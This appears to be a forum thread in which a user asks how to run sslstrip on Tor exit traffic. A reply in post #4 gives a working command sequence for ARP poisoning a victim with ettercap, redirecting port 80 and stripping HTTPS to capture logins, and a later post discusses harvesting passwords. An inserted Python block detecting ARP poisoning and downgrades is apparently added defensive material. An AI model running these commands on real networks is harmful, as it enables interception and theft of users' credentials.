
Thread: SSL Strip and Tor

  1. #1
    Just burned his ISO | Join Date: May 2009 | Posts: 15

    SSL Strip and Tor

    I am trying to recreate moxie's experiment of setting up an exit node and feeding the data to it. I know I could just arpspoof and use a second box (I have already done this, logging on to my email and finding my own posts), but I don't want all the extra network traffic. I am guessing I would need to modify his iptables command, but I have never worked much with network routing before. Does anyone have a good tutorial on how I would set up something similar (information exiting your computer destined to port 80 rerouted back to port 10000 without mucking up the information in the IP header, and having the response return to the correct port)? If I just run sslstrip and connect out using a browser, sslstrip does not record anything.

    Any help would be greatly appreciated.

  2. #2
    Member kazalku | Join Date: Feb 2009 | Posts: 416

    Did you search this forum or google? Try this.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  3. #3
    Just burned his ISO | Join Date: May 2009 | Posts: 15

    Quote Originally Posted by kazalku:
    Did you search this forum or google? *snip because I have not posted 15 times yet*.
    Yes, I did search. I found 5 different threads (including the one you linked) I was considering posting to, but every single one I found was talking about problems/HOWTOs with using arpspoof/ettercap. I decided to make a new one because I was looking for a cleaner implementation that did not flood the network with ARP packets. Thank you for the link, but do you know if ettercap has the same limitation as arpspoof of not being able to redirect packets originating from yourself?

    I will try and see if I can target myself with ettercap later today when I have time to try again.

    Thank you for the link,
    leftler

  4. #4
    Member kazalku | Join Date: Feb 2009 | Posts: 416

    Follow that tut and modify the last line to attack only one PC and see if it serves your purpose -

    a) echo "1" > /proc/sys/net/ipv4/ip_forward

    b) iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    c) python sslstrip.py -k -p -l 10000

    d) ettercap -i eth1 -Tq -M ARP /192.168.1.1/ /192.168.1.2/ -P autoadd
    where 192.168.1.1 is the router and 192.168.1.2 is the victim PC. I'm not 100% sure about the format (check the ettercap manual).
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein
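    The steps above (ARP poisoning a host's view of the gateway, then stripping HTTPS out of the redirected traffic) leave two visible traces on the victim's side: the gateway's ARP entry changes, and links that the origin serves as https arrive as http. The following is an added example of checking for both from the defender's position; it is not code from this thread, from ettercap or from sslstrip. The ARP snapshots, MAC addresses, IPs and HTML snippets are constructed sample data, and the function names are my own.

```python
"""
Defender-side checks for the two techniques discussed in this thread:
ARP cache poisoning (the ettercap step) and HTTPS-to-HTTP downgrading
(the sslstrip step). Every input below is constructed sample data.
"""
import re
from collections import defaultdict

# Constructed snapshots in the spirit of `arp -n` output: (ip, mac) pairs.
# BASELINE_ARP is taken on a known-clean network; POISONED_ARP is a later
# snapshot in which host .3 has started answering ARP for the router.
BASELINE_ARP = [
    ("192.168.1.1", "00:11:22:33:44:01"),   # router (hypothetical MAC)
    ("192.168.1.2", "00:11:22:33:44:02"),   # this host
    ("192.168.1.3", "00:11:22:33:44:03"),   # another LAN host
]

POISONED_ARP = [
    ("192.168.1.1", "00:11:22:33:44:03"),   # router now resolves to host .3's MAC
    ("192.168.1.2", "00:11:22:33:44:02"),
    ("192.168.1.3", "00:11:22:33:44:03"),
]


def arp_anomalies(baseline, current, gateway_ip):
    """Return findings describing ARP-cache changes that match a MITM pattern:
    the gateway's MAC changed since the baseline, or one MAC now answers for
    more than one IP (a poisoner claiming the gateway's address and its own)."""
    base = dict(baseline)
    cur = dict(current)
    findings = []
    if gateway_ip in base and gateway_ip in cur and base[gateway_ip] != cur[gateway_ip]:
        findings.append(
            f"gateway {gateway_ip} MAC changed {base[gateway_ip]} -> {cur[gateway_ip]}"
        )
    by_mac = defaultdict(list)
    for ip, mac in current:
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return findings


# Constructed: a fragment of a login page as the origin serves it, and the
# same fragment as seen through a stripping proxy that rewrote https to http.
ORIGIN_HTML = (
    '<form action="https://login.example.com/auth">'
    '<a href="https://example.com/">home</a>'
)
OBSERVED_HTML = (
    '<form action="http://login.example.com/auth">'
    '<a href="http://example.com/">home</a>'
)

HTTPS_URL = re.compile(r'https://[^\s"\'<>]+')
HTTP_URL = re.compile(r'http://[^\s"\'<>]+')


def downgraded_urls(origin_html, observed_html):
    """Return every URL that is https in the origin copy but reaches the
    client as plain http: the signature of an SSL-stripping proxy. The
    origin copy would come from an out-of-band fetch (or a stored canary)."""
    observed_http = set(HTTP_URL.findall(observed_html))
    downgraded = []
    for url in HTTPS_URL.findall(origin_html):
        plain = "http://" + url[len("https://"):]
        if plain in observed_http:
            downgraded.append(url)
    return downgraded


if __name__ == "__main__":
    for finding in arp_anomalies(BASELINE_ARP, POISONED_ARP, "192.168.1.1"):
        print("ARP:", finding)
    for url in downgraded_urls(ORIGIN_HTML, OBSERVED_HTML):
        print("downgraded:", url)
```

    The ARP check is the same comparison that arpwatch-style monitors perform continuously: a gateway MAC that changes without a known hardware swap is the single strongest indicator of the ettercap step in post #4. The downgrade check needs a trustworthy copy of the origin page (fetched over a path the suspected proxy cannot touch, or stored earlier), because the stripping proxy rewrites everything the client sees in-band.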

  5. #5
    Just burned his ISO | Join Date: May 2009 | Posts: 15

    You cannot ARP poison yourself with ettercap, I just tried.

    I think I may be unclear about what I am trying to do. I am trying to recreate Moxie's experiment where he hosted a Tor exit node, then MITMed the output through sslstrip before it went out to the internet. I know this can be done with one box, I just do not have the knowledge to do it. What I need is for sslstrip to strip outgoing connections originating from the same box that sslstrip is running on.

    On another note, ettercap is great for putting the user/pass combination into a readable format, but when I do the ARP poisoning it does not have them show up (even if it was a normal HTTP login; I use tinyurl.com/fakelogin to test). However, if I open a second instance with ettercap -i eth0 -Tq, that instance will have the passwords show up. Am I doing something wrong in ettercap, or is that just a limitation?


    P.S. I know some of you may not want to help because this sounds like a script kiddie request from someone who just wants MySpace passwords, but if that is all I wanted I could just easily do the two-box method and get them that way. I am doing this experiment to learn advanced network administration in *nix systems. I am even willing to make the effort to read man pages to learn; I just need to be pointed in the right direction to know where to begin looking. I know ARP poisoning myself is not the correct approach, but what is? A fake adapter, iptables, a privoxy setting, a named pipe? Any help would be greatly appreciated.

    -leftler
